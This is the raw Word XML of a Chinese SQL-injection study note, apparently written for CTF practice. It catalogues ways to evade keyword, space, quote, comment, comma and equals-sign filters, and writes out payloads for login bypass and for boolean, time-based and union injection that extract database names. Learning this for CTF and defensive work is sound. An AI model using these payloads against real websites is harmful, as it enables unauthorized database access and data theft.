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b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0)基础绕过</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr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大小写绕过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比如题目过滤了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select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关键字 , 那我们可以将select改为SELECT完成绕过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Waf语句: /select/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双写绕过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同样的也可以使用双写来尝试绕过,select -&gt; seleselectct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Waf语句: preg_replace(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select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,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 xml:space="preserve"> , $_GET[变量])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Latin1编码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Mysql表的默认编码为latin1 , 如果传参得到的编码为UTF-8 , 就会存在一些latin1有而UTF-8没有的字符 , 当mysql碰到这些字符时 , 会自动忽略 , 例如?username=admin%c2 , 存储至表中就变为admin , ( %c2-%ef 都可以)</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1)空格过滤绕过</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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替代绕过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空格可以由以下符号替代</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default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 xml:space="preserve">%20 , %09 , %0a , %0b , %0c , %0d , %a0 , /**/ , +  </w:t>
      </w:r>
    </w:p>
    <w:p/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例如: select/**/1,2,3/**/from/**/nisa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(/**/可以由上面任意一个来代)</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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括号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使用括号可以放弃空格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highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">例如: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>select(nisa_member)from(nisa);</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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反引号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Sql中的反引号是为了区分关键字 , 例如你有个表就叫select  , 为了区分关键字在查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询(或创建)时需要使用反引号 ,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> select*from`select`;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补上!!!或者~~!!!</w:t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4168140" cy="191262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传参值实际为: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>and!!!1=1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所以还是没有空格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同样的~~!!!也是可以的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970020" cy="133350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~和! 的数量规律没啥好探索的 , 三个!!!就够用了或者用两个~</w:t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b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2)引号过滤绕过</w:t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当遇到登录框时 , 我们常遇到的查询语句是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: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>select*from user where username=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>$_POST[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> and password=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>$_POST[</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”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如果过滤了单引号,我们可以尝试使用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\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转义字符来操作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假设传入username=admin\ , password=123# 此时拼接进sql语句就成为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: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>select*from user where username=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>admin\</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> and password=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>123#</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>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由于第二个单引号被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\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转义了, 第一个引号就和第三个引号配对, 此时再将最后的引号注释掉, 就能实现password的传参逃逸出来, 例如传password=and 1=1# 就可以尝试布尔盲注, 或者加上union 尝试联合注入</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>3)注释符过滤绕过</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3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替代绕过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%23 , ` (反引号) , --+ , %00(截断)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="lightGray"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>(php&lt;=5.3.4)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例如ctfshow_web入门_web180 , 注释符过滤了# , %23 , %00 用反引号来绕过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61635" cy="1086485"/>
            <wp:effectExtent l="0" t="0" r="9525" b="1079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1635" cy="1086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闭合尾部单引号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不加注释, 直接利用尾部的单引号构造闭合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传参 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>?id= 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1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拼接后就成为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>where id=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan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,完美解决了注释问题</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>4)逗号过滤绕过</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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From for</w:t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在使用盲注时,substr() 函数需要用到逗号,这里的逗号可以用from for替代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Substr(database() ,2 , 1 )  &lt;=&gt;  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>substr(database() from 2 for 1 )</w:t>
      </w:r>
    </w:p>
    <w:p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当for也被过滤时,用REVERSE反转来绕过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highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>substr(REVERSE(substr(database()from(-1)))from(-1))</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>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//REVERSE是反转字符串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等价于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截取database()的第</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> -1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>个字符,也就是最后一个,依次改为-2 ,-3爆出database()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Offset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Offset针对于limit中的逗号绕过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Select*from nisa limit 0,1  &lt;=&gt;  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>select*from nisa limit 1 offset 0</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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利用like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Select ascii(substr(database(),1,1))=98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等价于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Select database() like</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>b%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan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匹配就返回1, 不然就返回0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23260" cy="243078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4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Case when then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这个试用于时间盲注中,当逗号被ban时,if函数也就用不了了,此时就需要用case when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then 语句来尝试替代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if((length(database())&gt;1),sleep(5),1);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等价于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highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>select case when length(database())&gt;1 then sleep(5) else 1 end ;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5274310" cy="2421255"/>
            <wp:effectExtent l="0" t="0" r="1397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4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利用join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Union select 1,2,3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等价于</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default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Union select*from (select 1)a join (select 2)b join (select 3)c %23</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="minorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>5)等号过滤绕过</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Like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Select*from nisa where nisa_member=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bilala</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’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等价于</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="420" w:leftChars="0"/>
        <w:rPr>
          <w:rFonts w:hint="default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 xml:space="preserve">Select*from nisa where nisa_member like </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>b%</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’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183380" cy="1104900"/>
            <wp:effectExtent l="0" t="0" r="7620" b="762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Ps: SQL的模式匹配允许使用“_”匹配任何单个字符，而“%”匹配任意数目字符(包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括零个字符)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511040" cy="1432560"/>
            <wp:effectExtent l="0" t="0" r="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5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Regexp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这就和正则表达式的匹配模式一样了,引号内填写正则表达式就行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例如: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">select*from nisa where nisa_member regexp </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>^b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4267200" cy="1249680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这里就不对正则表达式展开介绍了</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="5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Between and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Select*from nisa where id =2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等价于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Select*from nisa where id between 2 and 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>//闭区间</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4244340" cy="1363980"/>
            <wp:effectExtent l="0" t="0" r="7620" b="762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5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Strcmp(str1 , str2)</w:t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// 如果str1与str2相等则会返回0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ascii(substr(database(),1,1))=97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等价于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Select strcmp(ascii(substr(database(),1,1)),97)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利用此函数构造payload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: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>select*from nisa where id=1 union select strcmp(ascii(substr(database(),1,1)),98),2,3;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928370"/>
            <wp:effectExtent l="0" t="0" r="4445" b="127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成功返回0,确定了database()的第一位为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b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’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&lt;&gt;就是不等于的意思,所以加上!就是等于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Select*from nisa where !(id&lt;&gt;1)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60420" cy="1181100"/>
            <wp:effectExtent l="0" t="0" r="7620" b="762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^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^是异或运算, 1^1=0 , 1^0=1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利用这个结果我们可以构造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Select*from nisa where id=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="cyan"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
